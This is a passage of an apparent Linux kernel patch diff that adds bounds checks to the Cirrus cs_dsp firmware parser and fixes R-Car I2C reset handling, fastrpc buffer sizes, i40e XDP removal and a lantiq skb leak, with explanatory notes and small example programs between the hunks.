+ 	err = hpet_ioctl_common(file->private_data, cmd, arg, &info);
+ 	mutex_unlock(&hpet_mutex);
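The two COMPAT_* definitions exist because the _IOx() macros encode sizeof(type) into the command number: HPET_IRQFREQ built against a 4-byte compat_ulong_t is a different integer than the native 8-byte version, so a 32-bit caller's command must be rewritten before the common handler's switch sees it. A small userspace program (Linux headers assumed) makes the size field visible:

	#include <stdint.h>
	#include <stdio.h>
	#include <sys/ioctl.h>

	/* uint32_t stands in for compat_ulong_t */
	#define HPET_IRQFREQ_64 _IOW('h', 0x6, unsigned long)
	#define HPET_IRQFREQ_32 _IOW('h', 0x6, uint32_t)

	int main(void)
	{
		printf("native cmd %#lx (size %u)\n",
		       (unsigned long)HPET_IRQFREQ_64,
		       (unsigned int)_IOC_SIZE(HPET_IRQFREQ_64));
		printf("compat cmd %#lx (size %u)\n",
		       (unsigned long)HPET_IRQFREQ_32,
		       (unsigned int)_IOC_SIZE(HPET_IRQFREQ_32));
		return 0;
	}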
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index 64ed9d3f5d5d8..ee4c32669607f 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -1014,9 +1014,16 @@ struct cs_dsp_coeff_parsed_coeff {
+ 	int len;
+ };
+ 
+-static int cs_dsp_coeff_parse_string(int bytes, const u8 **pos, const u8 **str)
++static int cs_dsp_coeff_parse_string(int bytes, const u8 **pos, unsigned int avail,
++				     const u8 **str)
+ {
+-	int length;
++	int length, total_field_len;
++
++	/* String fields are at least one __le32 */
++	if (sizeof(__le32) > avail) {
++		*pos = NULL;
++		return 0;
++	}
+ 
+ 	switch (bytes) {
+ 	case 1:
+@@ -1029,10 +1036,16 @@ static int cs_dsp_coeff_parse_string(int bytes, const u8 **pos, const u8 **str)
+ 		return 0;
+ 	}
+ 
++	total_field_len = ((length + bytes) + 3) & ~0x03;
++	if ((unsigned int)total_field_len > avail) {
++		*pos = NULL;
++		return 0;
++	}
++
+ 	if (str)
+ 		*str = *pos + bytes;
+ 
+-	*pos += ((length + bytes) + 3) & ~0x03;
++	*pos += total_field_len;
+ 
+ 	return length;
+ }
+@@ -1057,71 +1070,134 @@ static int cs_dsp_coeff_parse_int(int bytes, const u8 **pos)
+ 	return val;
+ }
+ 
+-static inline void cs_dsp_coeff_parse_alg(struct cs_dsp *dsp, const u8 **data,
+-					  struct cs_dsp_coeff_parsed_alg *blk)
++static int cs_dsp_coeff_parse_alg(struct cs_dsp *dsp,
++				  const struct wmfw_region *region,
++				  struct cs_dsp_coeff_parsed_alg *blk)
+ {
+ 	const struct wmfw_adsp_alg_data *raw;
++	unsigned int data_len = le32_to_cpu(region->len);
++	unsigned int pos;
++	const u8 *tmp;
++
++	raw = (const struct wmfw_adsp_alg_data *)region->data;
+ 
+ 	switch (dsp->fw_ver) {
+ 	case 0:
+ 	case 1:
+-		raw = (const struct wmfw_adsp_alg_data *)*data;
+-		*data = raw->data;
++		if (sizeof(*raw) > data_len)
++			return -EOVERFLOW;
+ 
+ 		blk->id = le32_to_cpu(raw->id);
+ 		blk->name = raw->name;
+-		blk->name_len = strlen(raw->name);
++		blk->name_len = strnlen(raw->name, ARRAY_SIZE(raw->name));
+ 		blk->ncoeff = le32_to_cpu(raw->ncoeff);
++
++		pos = sizeof(*raw);
+ 		break;
+ 	default:
+-		blk->id = cs_dsp_coeff_parse_int(sizeof(raw->id), data);
+-		blk->name_len = cs_dsp_coeff_parse_string(sizeof(u8), data,
++		if (sizeof(raw->id) > data_len)
++			return -EOVERFLOW;
++
++		tmp = region->data;
++		blk->id = cs_dsp_coeff_parse_int(sizeof(raw->id), &tmp);
++		pos = tmp - region->data;
++
++		tmp = &region->data[pos];
++		blk->name_len = cs_dsp_coeff_parse_string(sizeof(u8), &tmp, data_len - pos,
+ 							  &blk->name);
+-		cs_dsp_coeff_parse_string(sizeof(u16), data, NULL);
+-		blk->ncoeff = cs_dsp_coeff_parse_int(sizeof(raw->ncoeff), data);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		cs_dsp_coeff_parse_string(sizeof(u16), &tmp, data_len - pos, NULL);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		if (sizeof(raw->ncoeff) > (data_len - pos))
++			return -EOVERFLOW;
++
++		blk->ncoeff = cs_dsp_coeff_parse_int(sizeof(raw->ncoeff), &tmp);
++		pos += sizeof(raw->ncoeff);
+ 		break;
+ 	}
+ 
++	if ((int)blk->ncoeff < 0)
++		return -EOVERFLOW;
++
+ 	cs_dsp_dbg(dsp, "Algorithm ID: %#x\n", blk->id);
+ 	cs_dsp_dbg(dsp, "Algorithm name: %.*s\n", blk->name_len, blk->name);
+ 	cs_dsp_dbg(dsp, "# of coefficient descriptors: %#x\n", blk->ncoeff);
++
++	return pos;
+ }
+ 
+-static inline void cs_dsp_coeff_parse_coeff(struct cs_dsp *dsp, const u8 **data,
+-					    struct cs_dsp_coeff_parsed_coeff *blk)
++static int cs_dsp_coeff_parse_coeff(struct cs_dsp *dsp,
++				    const struct wmfw_region *region,
++				    unsigned int pos,
++				    struct cs_dsp_coeff_parsed_coeff *blk)
+ {
+ 	const struct wmfw_adsp_coeff_data *raw;
++	unsigned int data_len = le32_to_cpu(region->len);
++	unsigned int blk_len, blk_end_pos;
+ 	const u8 *tmp;
+-	int length;
++
++	raw = (const struct wmfw_adsp_coeff_data *)&region->data[pos];
++	if (sizeof(raw->hdr) > (data_len - pos))
++		return -EOVERFLOW;
++
++	blk_len = le32_to_cpu(raw->hdr.size);
++	if (blk_len > S32_MAX)
++		return -EOVERFLOW;
++
++	if (blk_len > (data_len - pos - sizeof(raw->hdr)))
++		return -EOVERFLOW;
++
++	blk_end_pos = pos + sizeof(raw->hdr) + blk_len;
++
++	blk->offset = le16_to_cpu(raw->hdr.offset);
++	blk->mem_type = le16_to_cpu(raw->hdr.type);
+ 
+ 	switch (dsp->fw_ver) {
+ 	case 0:
+ 	case 1:
+-		raw = (const struct wmfw_adsp_coeff_data *)*data;
+-		*data = *data + sizeof(raw->hdr) + le32_to_cpu(raw->hdr.size);
++		if (sizeof(*raw) > (data_len - pos))
++			return -EOVERFLOW;
+ 
+-		blk->offset = le16_to_cpu(raw->hdr.offset);
+-		blk->mem_type = le16_to_cpu(raw->hdr.type);
+ 		blk->name = raw->name;
+-		blk->name_len = strlen(raw->name);
++		blk->name_len = strnlen(raw->name, ARRAY_SIZE(raw->name));
+ 		blk->ctl_type = le16_to_cpu(raw->ctl_type);
+ 		blk->flags = le16_to_cpu(raw->flags);
+ 		blk->len = le32_to_cpu(raw->len);
+ 		break;
+ 	default:
+-		tmp = *data;
+-		blk->offset = cs_dsp_coeff_parse_int(sizeof(raw->hdr.offset), &tmp);
+-		blk->mem_type = cs_dsp_coeff_parse_int(sizeof(raw->hdr.type), &tmp);
+-		length = cs_dsp_coeff_parse_int(sizeof(raw->hdr.size), &tmp);
+-		blk->name_len = cs_dsp_coeff_parse_string(sizeof(u8), &tmp,
++		pos += sizeof(raw->hdr);
++		tmp = &region->data[pos];
++		blk->name_len = cs_dsp_coeff_parse_string(sizeof(u8), &tmp, data_len - pos,
+ 							  &blk->name);
+-		cs_dsp_coeff_parse_string(sizeof(u8), &tmp, NULL);
+-		cs_dsp_coeff_parse_string(sizeof(u16), &tmp, NULL);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		cs_dsp_coeff_parse_string(sizeof(u8), &tmp, data_len - pos, NULL);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		cs_dsp_coeff_parse_string(sizeof(u16), &tmp, data_len - pos, NULL);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		if (sizeof(raw->ctl_type) + sizeof(raw->flags) + sizeof(raw->len) >
++		    (data_len - pos))
++			return -EOVERFLOW;
++
+ 		blk->ctl_type = cs_dsp_coeff_parse_int(sizeof(raw->ctl_type), &tmp);
++		pos += sizeof(raw->ctl_type);
+ 		blk->flags = cs_dsp_coeff_parse_int(sizeof(raw->flags), &tmp);
++		pos += sizeof(raw->flags);
+ 		blk->len = cs_dsp_coeff_parse_int(sizeof(raw->len), &tmp);
+-
+-		*data = *data + sizeof(raw->hdr) + length;
+ 		break;
+ 	}
+ 
+@@ -1131,6 +1207,8 @@ static inline void cs_dsp_coeff_parse_coeff(struct cs_dsp *dsp, const u8 **data,
+ 	cs_dsp_dbg(dsp, "\tCoefficient flags: %#x\n", blk->flags);
+ 	cs_dsp_dbg(dsp, "\tALSA control type: %#x\n", blk->ctl_type);
+ 	cs_dsp_dbg(dsp, "\tALSA control len: %#x\n", blk->len);
++
++	return blk_end_pos;
+ }
+ 
+ static int cs_dsp_check_coeff_flags(struct cs_dsp *dsp,
+@@ -1154,12 +1232,16 @@ static int cs_dsp_parse_coeff(struct cs_dsp *dsp,
+ 	struct cs_dsp_alg_region alg_region = {};
+ 	struct cs_dsp_coeff_parsed_alg alg_blk;
+ 	struct cs_dsp_coeff_parsed_coeff coeff_blk;
+-	const u8 *data = region->data;
+-	int i, ret;
++	int i, pos, ret;
++
++	pos = cs_dsp_coeff_parse_alg(dsp, region, &alg_blk);
++	if (pos < 0)
++		return pos;
+ 
+-	cs_dsp_coeff_parse_alg(dsp, &data, &alg_blk);
+ 	for (i = 0; i < alg_blk.ncoeff; i++) {
+-		cs_dsp_coeff_parse_coeff(dsp, &data, &coeff_blk);
++		pos = cs_dsp_coeff_parse_coeff(dsp, region, pos, &coeff_blk);
++		if (pos < 0)
++			return pos;
+ 
+ 		switch (coeff_blk.ctl_type) {
+ 		case WMFW_CTL_TYPE_BYTES:
+@@ -1228,6 +1310,10 @@ static unsigned int cs_dsp_adsp1_parse_sizes(struct cs_dsp *dsp,
+ 	const struct wmfw_adsp1_sizes *adsp1_sizes;
+ 
+ 	adsp1_sizes = (void *)&firmware->data[pos];
++	if (sizeof(*adsp1_sizes) > firmware->size - pos) {
++		cs_dsp_err(dsp, "%s: file truncated\n", file);
++		return 0;
++	}
+ 
+ 	cs_dsp_dbg(dsp, "%s: %d DM, %d PM, %d ZM\n", file,
+ 		   le32_to_cpu(adsp1_sizes->dm), le32_to_cpu(adsp1_sizes->pm),
+@@ -1244,6 +1330,10 @@ static unsigned int cs_dsp_adsp2_parse_sizes(struct cs_dsp *dsp,
+ 	const struct wmfw_adsp2_sizes *adsp2_sizes;
+ 
+ 	adsp2_sizes = (void *)&firmware->data[pos];
++	if (sizeof(*adsp2_sizes) > firmware->size - pos) {
++		cs_dsp_err(dsp, "%s: file truncated\n", file);
++		return 0;
++	}
+ 
+ 	cs_dsp_dbg(dsp, "%s: %d XM, %d YM %d PM, %d ZM\n", file,
+ 		   le32_to_cpu(adsp2_sizes->xm), le32_to_cpu(adsp2_sizes->ym),
+@@ -1283,7 +1373,6 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 	struct regmap *regmap = dsp->regmap;
+ 	unsigned int pos = 0;
+ 	const struct wmfw_header *header;
+-	const struct wmfw_adsp1_sizes *adsp1_sizes;
+ 	const struct wmfw_footer *footer;
+ 	const struct wmfw_region *region;
+ 	const struct cs_dsp_region *mem;
+@@ -1296,10 +1385,8 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 
+ 	ret = -EINVAL;
+ 
+-	pos = sizeof(*header) + sizeof(*adsp1_sizes) + sizeof(*footer);
+-	if (pos >= firmware->size) {
+-		cs_dsp_err(dsp, "%s: file too short, %zu bytes\n",
+-			   file, firmware->size);
++	if (sizeof(*header) >= firmware->size) {
++		ret = -EOVERFLOW;
+ 		goto out_fw;
+ 	}
+ 
+@@ -1327,22 +1414,36 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 
+ 	pos = sizeof(*header);
+ 	pos = dsp->ops->parse_sizes(dsp, file, pos, firmware);
++	if ((pos == 0) || (sizeof(*footer) > firmware->size - pos)) {
++		ret = -EOVERFLOW;
++		goto out_fw;
++	}
+ 
+ 	footer = (void *)&firmware->data[pos];
+ 	pos += sizeof(*footer);
+ 
+ 	if (le32_to_cpu(header->len) != pos) {
+-		cs_dsp_err(dsp, "%s: unexpected header length %d\n",
+-			   file, le32_to_cpu(header->len));
++		ret = -EOVERFLOW;
+ 		goto out_fw;
+ 	}
+ 
+ 	cs_dsp_dbg(dsp, "%s: timestamp %llu\n", file,
+ 		   le64_to_cpu(footer->timestamp));
+ 
+-	while (pos < firmware->size &&
+-	       sizeof(*region) < firmware->size - pos) {
++	while (pos < firmware->size) {
++		/* Is there enough data for a complete block header? */
++		if (sizeof(*region) > firmware->size - pos) {
++			ret = -EOVERFLOW;
++			goto out_fw;
++		}
++
+ 		region = (void *)&(firmware->data[pos]);
++
++		if (le32_to_cpu(region->len) > firmware->size - pos - sizeof(*region)) {
++			ret = -EOVERFLOW;
++			goto out_fw;
++		}
++
+ 		region_name = "Unknown";
+ 		reg = 0;
+ 		text = NULL;
+@@ -1399,16 +1500,6 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 			   regions, le32_to_cpu(region->len), offset,
+ 			   region_name);
+ 
+-		if (le32_to_cpu(region->len) >
+-		    firmware->size - pos - sizeof(*region)) {
+-			cs_dsp_err(dsp,
+-				   "%s.%d: %s region len %d bytes exceeds file length %zu\n",
+-				   file, regions, region_name,
+-				   le32_to_cpu(region->len), firmware->size);
+-			ret = -EINVAL;
+-			goto out_fw;
+-		}
+-
+ 		if (text) {
+ 			memcpy(text, region->data, le32_to_cpu(region->len));
+ 			cs_dsp_info(dsp, "%s: %s\n", file, text);
+@@ -1459,6 +1550,9 @@ static int cs_dsp_load(struct cs_dsp *dsp, const struct firmware *firmware,
+ 	cs_dsp_buf_free(&buf_list);
+ 	kfree(text);
+ 
++	if (ret == -EOVERFLOW)
++		cs_dsp_err(dsp, "%s: file content overflows file data\n", file);
++
+ 	return ret;
+ }
+ 
+@@ -2026,10 +2120,20 @@ static int cs_dsp_load_coeff(struct cs_dsp *dsp, const struct firmware *firmware
+ 	pos = le32_to_cpu(hdr->len);
+ 
+ 	blocks = 0;
+-	while (pos < firmware->size &&
+-	       sizeof(*blk) < firmware->size - pos) {
++	while (pos < firmware->size) {
++		/* Is there enough data for a complete block header? */
++		if (sizeof(*blk) > firmware->size - pos) {
++			ret = -EOVERFLOW;
++			goto out_fw;
++		}
++
+ 		blk = (void *)(&firmware->data[pos]);
+ 
++		if (le32_to_cpu(blk->len) > firmware->size - pos - sizeof(*blk)) {
++			ret = -EOVERFLOW;
++			goto out_fw;
++		}
++
+ 		type = le16_to_cpu(blk->type);
+ 		offset = le16_to_cpu(blk->offset);
+ 		version = le32_to_cpu(blk->ver) >> 8;
+@@ -2125,17 +2229,6 @@ static int cs_dsp_load_coeff(struct cs_dsp *dsp, const struct firmware *firmware
+ 		}
+ 
+ 		if (reg) {
+-			if (le32_to_cpu(blk->len) >
+-			    firmware->size - pos - sizeof(*blk)) {
+-				cs_dsp_err(dsp,
+-					   "%s.%d: %s region len %d bytes exceeds file length %zu\n",
+-					   file, blocks, region_name,
+-					   le32_to_cpu(blk->len),
+-					   firmware->size);
+-				ret = -EINVAL;
+-				goto out_fw;
+-			}
+-
+ 			buf = cs_dsp_buf_alloc(blk->data,
+ 					       le32_to_cpu(blk->len),
+ 					       &buf_list);
+@@ -2175,6 +2268,10 @@ static int cs_dsp_load_coeff(struct cs_dsp *dsp, const struct firmware *firmware
+ 	regmap_async_complete(regmap);
+ 	cs_dsp_buf_free(&buf_list);
+ 	kfree(text);
++
++	if (ret == -EOVERFLOW)
++		cs_dsp_err(dsp, "%s: file content overflows file data\n", file);
++
+ 	return ret;
+ }
+ 
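All of the cs_dsp hunks apply one parsing discipline: check that a field fits within the bytes remaining before dereferencing it, and have each parser return the next offset (or a negative error) instead of advancing a caller-owned pointer, so no arithmetic happens on unvalidated lengths. The skeleton of that pattern, with hypothetical struct names rather than the driver's:

	struct blk_hdr {
		__le32 payload_len;
	} __packed;

	struct parsed {
		const u8 *payload;
		u32 payload_len;
	};

	/* Caller guarantees pos <= len */
	static int parse_block(const u8 *data, unsigned int len,
			       unsigned int pos, struct parsed *out)
	{
		const struct blk_hdr *h;

		if (sizeof(*h) > len - pos)
			return -EOVERFLOW;	/* header doesn't fit */
		h = (const struct blk_hdr *)&data[pos];

		if (le32_to_cpu(h->payload_len) > len - pos - sizeof(*h))
			return -EOVERFLOW;	/* payload doesn't fit */

		out->payload = (const u8 *)(h + 1);
		out->payload_len = le32_to_cpu(h->payload_len);
		return pos + sizeof(*h) + out->payload_len;	/* next offset */
	}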
+diff --git a/drivers/i2c/busses/i2c-rcar.c b/drivers/i2c/busses/i2c-rcar.c
+index cef82b205c261..d0098e342ba22 100644
+--- a/drivers/i2c/busses/i2c-rcar.c
++++ b/drivers/i2c/busses/i2c-rcar.c
+@@ -114,6 +114,7 @@ enum rcar_i2c_type {
+ 	I2C_RCAR_GEN1,
+ 	I2C_RCAR_GEN2,
+ 	I2C_RCAR_GEN3,
++	I2C_RCAR_GEN4,
+ };
+ 
+ struct rcar_i2c_priv {
+@@ -223,6 +224,14 @@ static void rcar_i2c_init(struct rcar_i2c_priv *priv)
+ 
+ }
+ 
++static void rcar_i2c_reset_slave(struct rcar_i2c_priv *priv)
++{
++	rcar_i2c_write(priv, ICSIER, 0);
++	rcar_i2c_write(priv, ICSSR, 0);
++	rcar_i2c_write(priv, ICSCR, SDBS);
++	rcar_i2c_write(priv, ICSAR, 0); /* Gen2: must be 0 if not using slave */
++}
++
+ static int rcar_i2c_bus_barrier(struct rcar_i2c_priv *priv)
+ {
+ 	int ret;
+@@ -386,8 +395,8 @@ static void rcar_i2c_cleanup_dma(struct rcar_i2c_priv *priv, bool terminate)
+ 	dma_unmap_single(chan->device->dev, sg_dma_address(&priv->sg),
+ 			 sg_dma_len(&priv->sg), priv->dma_direction);
+ 
+-	/* Gen3 can only do one RXDMA per transfer and we just completed it */
+-	if (priv->devtype == I2C_RCAR_GEN3 &&
++	/* Gen3+ can only do one RXDMA per transfer and we just completed it */
++	if (priv->devtype >= I2C_RCAR_GEN3 &&
+ 	    priv->dma_direction == DMA_FROM_DEVICE)
+ 		priv->flags |= ID_P_NO_RXDMA;
+ 
+@@ -815,6 +824,10 @@ static int rcar_i2c_do_reset(struct rcar_i2c_priv *priv)
+ {
+ 	int ret;
+ 
++	/* Don't reset if a slave instance is currently running */
++	if (priv->slave)
++		return -EISCONN;
++
+ 	ret = reset_control_reset(priv->rstc);
+ 	if (ret)
+ 		return ret;
+@@ -841,14 +854,12 @@ static int rcar_i2c_master_xfer(struct i2c_adapter *adap,
+ 	if (ret < 0)
+ 		goto out;
+ 
+-	/* Gen3 needs a reset before allowing RXDMA once */
+-	if (priv->devtype == I2C_RCAR_GEN3) {
+-		priv->flags |= ID_P_NO_RXDMA;
+-		if (!IS_ERR(priv->rstc)) {
+-			ret = rcar_i2c_do_reset(priv);
+-			if (ret == 0)
+-				priv->flags &= ~ID_P_NO_RXDMA;
+-		}
++	/* Gen3+ needs a reset. That also allows RXDMA once */
++	if (priv->devtype >= I2C_RCAR_GEN3) {
++		ret = rcar_i2c_do_reset(priv);
++		if (ret)
++			goto out;
++		priv->flags &= ~ID_P_NO_RXDMA;
+ 	}
+ 
+ 	rcar_i2c_init(priv);
+@@ -975,11 +986,8 @@ static int rcar_unreg_slave(struct i2c_client *slave)
+ 
+ 	/* ensure no irq is running before clearing ptr */
+ 	disable_irq(priv->irq);
+-	rcar_i2c_write(priv, ICSIER, 0);
+-	rcar_i2c_write(priv, ICSSR, 0);
++	rcar_i2c_reset_slave(priv);
+ 	enable_irq(priv->irq);
+-	rcar_i2c_write(priv, ICSCR, SDBS);
+-	rcar_i2c_write(priv, ICSAR, 0); /* Gen2: must be 0 if not using slave */
+ 
+ 	priv->slave = NULL;
+ 
+@@ -1032,7 +1040,7 @@ static const struct of_device_id rcar_i2c_dt_ids[] = {
+ 	{ .compatible = "renesas,rcar-gen1-i2c", .data = (void *)I2C_RCAR_GEN1 },
+ 	{ .compatible = "renesas,rcar-gen2-i2c", .data = (void *)I2C_RCAR_GEN2 },
+ 	{ .compatible = "renesas,rcar-gen3-i2c", .data = (void *)I2C_RCAR_GEN3 },
+-	{ .compatible = "renesas,rcar-gen4-i2c", .data = (void *)I2C_RCAR_GEN3 },
++	{ .compatible = "renesas,rcar-gen4-i2c", .data = (void *)I2C_RCAR_GEN4 },
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, rcar_i2c_dt_ids);
+@@ -1092,22 +1100,15 @@ static int rcar_i2c_probe(struct platform_device *pdev)
+ 		goto out_pm_disable;
+ 	}
+ 
+-	rcar_i2c_write(priv, ICSAR, 0); /* Gen2: must be 0 if not using slave */
++	/* Bring hardware to known state */
++	rcar_i2c_init(priv);
++	rcar_i2c_reset_slave(priv);
+ 
+ 	if (priv->devtype < I2C_RCAR_GEN3) {
+ 		irqflags |= IRQF_NO_THREAD;
+ 		irqhandler = rcar_i2c_gen2_irq;
+ 	}
+ 
+-	if (priv->devtype == I2C_RCAR_GEN3) {
+-		priv->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+-		if (!IS_ERR(priv->rstc)) {
+-			ret = reset_control_status(priv->rstc);
+-			if (ret < 0)
+-				priv->rstc = ERR_PTR(-ENOTSUPP);
+-		}
+-	}
+-
+ 	/* Stay always active when multi-master to keep arbitration working */
+ 	if (of_property_read_bool(dev->of_node, "multi-master"))
+ 		priv->flags |= ID_P_PM_BLOCKED;
+@@ -1117,6 +1118,22 @@ static int rcar_i2c_probe(struct platform_device *pdev)
+ 	if (of_property_read_bool(dev->of_node, "smbus"))
+ 		priv->flags |= ID_P_HOST_NOTIFY;
+ 
++	/* R-Car Gen3+ needs a reset before every transfer */
++	if (priv->devtype >= I2C_RCAR_GEN3) {
++		priv->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
++		if (IS_ERR(priv->rstc)) {
++			ret = PTR_ERR(priv->rstc);
++			goto out_pm_put;
++		}
++
++		ret = reset_control_status(priv->rstc);
++		if (ret < 0)
++			goto out_pm_put;
++
++		/* hard reset disturbs HostNotify local target, so disable it */
++		priv->flags &= ~ID_P_HOST_NOTIFY;
++	}
++
+ 	ret = platform_get_irq(pdev, 0);
+ 	if (ret < 0)
+ 		goto out_pm_put;
+diff --git a/drivers/i2c/i2c-core-base.c b/drivers/i2c/i2c-core-base.c
+index 8af82f42af30b..d6a879f1542c5 100644
+--- a/drivers/i2c/i2c-core-base.c
++++ b/drivers/i2c/i2c-core-base.c
+@@ -1049,6 +1049,7 @@ EXPORT_SYMBOL(i2c_find_device_by_fwnode);
+ 
+ static const struct i2c_device_id dummy_id[] = {
+ 	{ "dummy", 0 },
++	{ "smbus_host_notify", 0 },
+ 	{ },
+ };
+ 
+diff --git a/drivers/i2c/i2c-slave-testunit.c b/drivers/i2c/i2c-slave-testunit.c
+index 54c08f48a8b85..b9967a5a7d255 100644
+--- a/drivers/i2c/i2c-slave-testunit.c
++++ b/drivers/i2c/i2c-slave-testunit.c
+@@ -118,6 +118,13 @@ static int i2c_slave_testunit_slave_cb(struct i2c_client *client,
+ 			queue_delayed_work(system_long_wq, &tu->worker,
+ 					   msecs_to_jiffies(10 * tu->regs[TU_REG_DELAY]));
+ 		}
++
++		/*
++		 * Reset reg_idx to avoid that work gets queued again in case of
++		 * STOP after a following read message. But do not clear TU regs
++		 * here because we still need them in the workqueue!
++		 */
++		tu->reg_idx = 0;
+ 		break;
+ 
+ 	case I2C_SLAVE_WRITE_REQUESTED:
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 69cc24962706c..6c94364019c81 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -1509,16 +1509,20 @@ static int fastrpc_get_info_from_dsp(struct fastrpc_user *fl, uint32_t *dsp_attr
+ {
+ 	struct fastrpc_invoke_args args[2] = { 0 };
+ 
+-	/* Capability filled in userspace */
++	/*
++	 * Capability filled in userspace. This carries the information
++	 * about the remoteproc support which is fetched from the remoteproc
++	 * sysfs node by userspace.
++	 */
+ 	dsp_attr_buf[0] = 0;
++	dsp_attr_buf_len -= 1;
+ 
+ 	args[0].ptr = (u64)(uintptr_t)&dsp_attr_buf_len;
+ 	args[0].length = sizeof(dsp_attr_buf_len);
+ 	args[0].fd = -1;
+ 	args[1].ptr = (u64)(uintptr_t)&dsp_attr_buf[1];
+-	args[1].length = dsp_attr_buf_len;
++	args[1].length = dsp_attr_buf_len * sizeof(u32);
+ 	args[1].fd = -1;
+-	fl->pd = USER_PD;
+ 
+ 	return fastrpc_internal_invoke(fl, true, FASTRPC_DSP_UTILITIES_HANDLE,
+ 				       FASTRPC_SCALARS(0, 1, 1), args);
+@@ -1546,7 +1550,7 @@ static int fastrpc_get_info_from_kernel(struct fastrpc_ioctl_capability *cap,
+ 	if (!dsp_attributes)
+ 		return -ENOMEM;
+ 
+-	err = fastrpc_get_info_from_dsp(fl, dsp_attributes, FASTRPC_MAX_DSP_ATTRIBUTES_LEN);
++	err = fastrpc_get_info_from_dsp(fl, dsp_attributes, FASTRPC_MAX_DSP_ATTRIBUTES);
+ 	if (err == DSP_UNSUPPORTED_API) {
+ 		dev_info(&cctx->rpdev->dev,
+ 			 "Warning: DSP capabilities not supported on domain: %d\n", domain);
+@@ -1599,7 +1603,7 @@ static int fastrpc_get_dsp_info(struct fastrpc_user *fl, char __user *argp)
+ 	if (err)
+ 		return err;
+ 
+-	if (copy_to_user(argp, &cap.capability, sizeof(cap.capability)))
++	if (copy_to_user(argp, &cap, sizeof(cap)))
+ 		return -EFAULT;
+ 
+ 	return 0;
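Two unit mismatches are corrected at once in the fastrpc hunk: the DSP expects the attribute count in u32 elements while the transport wants args[1].length in bytes, and the final copy_to_user() has to cover the whole capability struct rather than just its last member. A fragment mirroring the fixed call setup (shapes from the patch, values illustrative):

	u32 attrs[FASTRPC_MAX_DSP_ATTRIBUTES];
	u32 nattrs = FASTRPC_MAX_DSP_ATTRIBUTES - 1;	/* slot 0 filled locally */

	args[0].ptr    = (u64)(uintptr_t)&nattrs;	/* element count in */
	args[0].length = sizeof(nattrs);
	args[0].fd     = -1;
	args[1].ptr    = (u64)(uintptr_t)&attrs[1];
	args[1].length = nattrs * sizeof(u32);		/* byte length out */
	args[1].fd     = -1;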
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 9efd4b962dce2..1194dcacbd29e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -13315,6 +13315,10 @@ static int i40e_xdp_setup(struct i40e_vsi *vsi, struct bpf_prog *prog,
+ 	bool need_reset;
+ 	int i;
+ 
++	/* VSI shall be deleted in a moment, block loading new programs */
++	if (prog && test_bit(__I40E_IN_REMOVE, pf->state))
++		return -EINVAL;
++
+ 	/* Don't allow frames that span over multiple buffers */
+ 	if (frame_size > i40e_calculate_vsi_rx_buf_len(vsi)) {
+ 		NL_SET_ERR_MSG_MOD(extack, "MTU too large to enable XDP");
+@@ -13323,14 +13327,9 @@ static int i40e_xdp_setup(struct i40e_vsi *vsi, struct bpf_prog *prog,
+ 
+ 	/* When turning XDP on->off/off->on we reset and rebuild the rings. */
+ 	need_reset = (i40e_enabled_xdp_vsi(vsi) != !!prog);
+-
+ 	if (need_reset)
+ 		i40e_prep_for_reset(pf);
+ 
+-	/* VSI shall be deleted in a moment, just return EINVAL */
+-	if (test_bit(__I40E_IN_REMOVE, pf->state))
+-		return -EINVAL;
+-
+ 	old_prog = xchg(&vsi->xdp_prog, prog);
+ 
+ 	if (need_reset) {
+diff --git a/drivers/net/ethernet/lantiq_etop.c b/drivers/net/ethernet/lantiq_etop.c
+index f5961bdcc4809..61baf1da76eea 100644
+--- a/drivers/net/ethernet/lantiq_etop.c
++++ b/drivers/net/ethernet/lantiq_etop.c
+@@ -217,9 +217,9 @@ ltq_etop_free_channel(struct net_device *dev, struct ltq_etop_chan *ch)
+ 	if (ch->dma.irq)
+ 		free_irq(ch->dma.irq, priv);
+ 	if (IS_RX(ch->idx)) {
+-		int desc;
++		struct ltq_dma_channel *dma = &ch->dma;
+ 
+-		for (desc = 0; desc < LTQ_DESC_NUM; desc++)
++		for (dma->desc = 0; dma->desc < LTQ_DESC_NUM; dma->desc++)
+ 			dev_kfree_skb_any(ch->skb[ch->dma.desc]);
+ 	}
+ }
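The lantiq change fixes a loop whose induction variable and array index had drifted apart: the old code counted a local desc from 0 to LTQ_DESC_NUM but always freed ch->skb[ch->dma.desc], i.e. the same slot every iteration, leaking the rest. A reduced reproduction of the bug pattern:

	#include <stdio.h>

	#define N 4

	int main(void)
	{
		struct { int desc; } dma = { .desc = 2 };
		int freed[N] = { 0 };

		/* Loop variable and index variable are not the same! */
		for (int desc = 0; desc < N; desc++)
			freed[dma.desc]++;	/* always slot 2 */

		for (int i = 0; i < N; i++)
			printf("slot %d freed %d times\n", i, freed[i]);
		return 0;		/* slots 0, 1 and 3 leak */
	}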
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index be70269e91684..c288589446935 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -1084,6 +1084,8 @@ struct nix_vtag_config_rsp {
+ 	 */
+ };
+ 
